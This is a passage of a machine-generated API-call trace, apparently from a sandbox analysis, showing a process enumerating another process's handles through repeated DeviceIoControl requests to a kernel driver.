(HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.146] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x102, lpOverlapped=0x0) returned 1 [0245.146] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.146] PsAcquireProcessExitSynchronization () returned 0x0 [0245.146] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.146] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003705070, HandleInformation=0x0) returned 0x0 [0245.146] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.146] PsReleaseProcessExitSynchronization () returned 0x2 [0245.146] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.146] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.146] ObfDereferenceObject (Object=0xfffffa8003705070) returned 0x1 [0245.146] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.146] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.146] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.146] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0245.146] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.146] PsAcquireProcessExitSynchronization () returned 0x0 [0245.146] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.146] ObReferenceObjectByHandle (in: Handle=0x108, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0245.146] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.146] PsReleaseProcessExitSynchronization () returned 0x2 [0245.146] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.146] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.147] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0xb [0245.147] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.147] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.147] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.147] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0245.147] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.147] PsAcquireProcessExitSynchronization () returned 0x0 [0245.147] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.147] ObReferenceObjectByHandle (in: Handle=0x114, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0245.147] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.147] PsReleaseProcessExitSynchronization () returned 0x2 [0245.147] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.147] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.147] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x51 [0245.147] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.147] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.148] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.148] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0245.148] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.148] PsAcquireProcessExitSynchronization () returned 0x0 [0245.148] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.148] ObReferenceObjectByHandle (in: Handle=0x13c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037252d0, HandleInformation=0x0) returned 0x0 [0245.148] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.148] PsReleaseProcessExitSynchronization () returned 0x2 [0245.148] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.148] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.148] ObfDereferenceObject (Object=0xfffffa80037252d0) returned 0x1 [0245.148] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.148] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.148] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.148] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0245.148] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.148] PsAcquireProcessExitSynchronization () returned 0x0 [0245.148] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.148] ObReferenceObjectByHandle (in: Handle=0x144, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037201f0, HandleInformation=0x0) returned 0x0 [0245.148] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.148] PsReleaseProcessExitSynchronization () returned 0x2 [0245.148] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.148] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.148] ObfDereferenceObject (Object=0xfffffa80037201f0) returned 0x1 [0245.149] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.149] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.149] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.149] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0245.149] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.149] PsAcquireProcessExitSynchronization () returned 0x0 [0245.149] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.149] ObReferenceObjectByHandle (in: Handle=0x150, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0245.149] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.149] PsReleaseProcessExitSynchronization () returned 0x2 [0245.149] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.149] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.149] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0245.149] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.149] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.149] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.149] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0245.149] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.149] PsAcquireProcessExitSynchronization () returned 0x0 [0245.149] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.149] ObReferenceObjectByHandle (in: Handle=0x168, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0245.149] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.149] PsReleaseProcessExitSynchronization () returned 0x2 [0245.149] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.149] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.149] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0245.149] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.149] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.149] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.150] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0245.150] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.150] PsAcquireProcessExitSynchronization () returned 0x0 [0245.150] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.150] ObReferenceObjectByHandle (in: Handle=0x16c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003721490, HandleInformation=0x0) returned 0x0 [0245.150] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.150] PsReleaseProcessExitSynchronization () returned 0x2 [0245.150] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.150] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.150] ObfDereferenceObject (Object=0xfffffa8003721490) returned 0x1 [0245.150] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.150] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.150] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.150] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xf4, lpOverlapped=0x0) returned 1 [0245.150] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.150] PsAcquireProcessExitSynchronization () returned 0x0 [0245.150] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.150] ObReferenceObjectByHandle (in: Handle=0x174, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800371d5e0, HandleInformation=0x0) returned 0x0 [0245.150] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.150] PsReleaseProcessExitSynchronization () returned 0x2 [0245.150] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.150] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.150] ObfDereferenceObject (Object=0xfffffa800371d5e0) returned 0x1 [0245.150] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.150] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.150] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.150] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0xf4, lpOverlapped=0x0) returned 1 [0245.150] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.150] PsAcquireProcessExitSynchronization () returned 0x0 [0245.151] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.151] ObReferenceObjectByHandle (in: Handle=0x178, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003712730, HandleInformation=0x0) returned 0x0 [0245.151] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.151] PsReleaseProcessExitSynchronization () returned 0x2 [0245.151] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.151] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.151] ObfDereferenceObject (Object=0xfffffa8003712730) returned 0x1 [0245.151] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.151] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.151] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.151] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0245.151] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.151] PsAcquireProcessExitSynchronization () returned 0x0 [0245.151] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.151] ObReferenceObjectByHandle (in: Handle=0x18c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003744410, HandleInformation=0x0) returned 0x0 [0245.151] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.151] PsReleaseProcessExitSynchronization () returned 0x2 [0245.151] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.151] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.151] ObfDereferenceObject (Object=0xfffffa8003744410) returned 0x1 [0245.151] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.151] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.151] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.151] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0245.151] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.151] PsAcquireProcessExitSynchronization () returned 0x0 [0245.152] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.152] ObReferenceObjectByHandle (in: Handle=0x1c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037375e0, HandleInformation=0x0) returned 0x0 [0245.329] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.329] PsReleaseProcessExitSynchronization () returned 0x2 [0245.329] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.329] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.329] ObfDereferenceObject (Object=0xfffffa80037375e0) returned 0x1 [0245.329] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.329] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.329] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.329] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0245.329] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.329] PsAcquireProcessExitSynchronization () returned 0x0 [0245.330] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.330] ObReferenceObjectByHandle (in: Handle=0x20c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037705e0, HandleInformation=0x0) returned 0x0 [0245.330] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.330] PsReleaseProcessExitSynchronization () returned 0x2 [0245.330] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.330] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.330] ObfDereferenceObject (Object=0xfffffa80037705e0) returned 0x1 [0245.330] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.330] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.330] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0245.330] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.330] PsAcquireProcessExitSynchronization () returned 0x0 [0245.330] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.330] ObReferenceObjectByHandle (in: Handle=0x278, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037ba730, HandleInformation=0x0) returned 0x0 [0245.330] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.330] PsReleaseProcessExitSynchronization () returned 0x2 [0245.330] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.330] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030c5044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030c5044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.330] ObfDereferenceObject (Object=0xfffffa80037ba730) returned 0x1 [0245.330] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.330] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.330] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.330] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0245.330] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.330] PsAcquireProcessExitSynchronization () returned 0x0 [0245.330] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880053c85d0) [0245.330] ObReferenceObjectByHandle (in: Handle=0x298, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037b6730, HandleInformation=0x0) returned 0x0 [0245.330] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.330] PsReleaseProcessExitSynchronization () returned 0x2 [0245.330] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0245.331] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.331] ObfDereferenceObject (Object=0xfffffa80037b6730) returned 0x1 [0245.331] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.331] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.331] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.331] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0245.331] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880053c8558 | out: 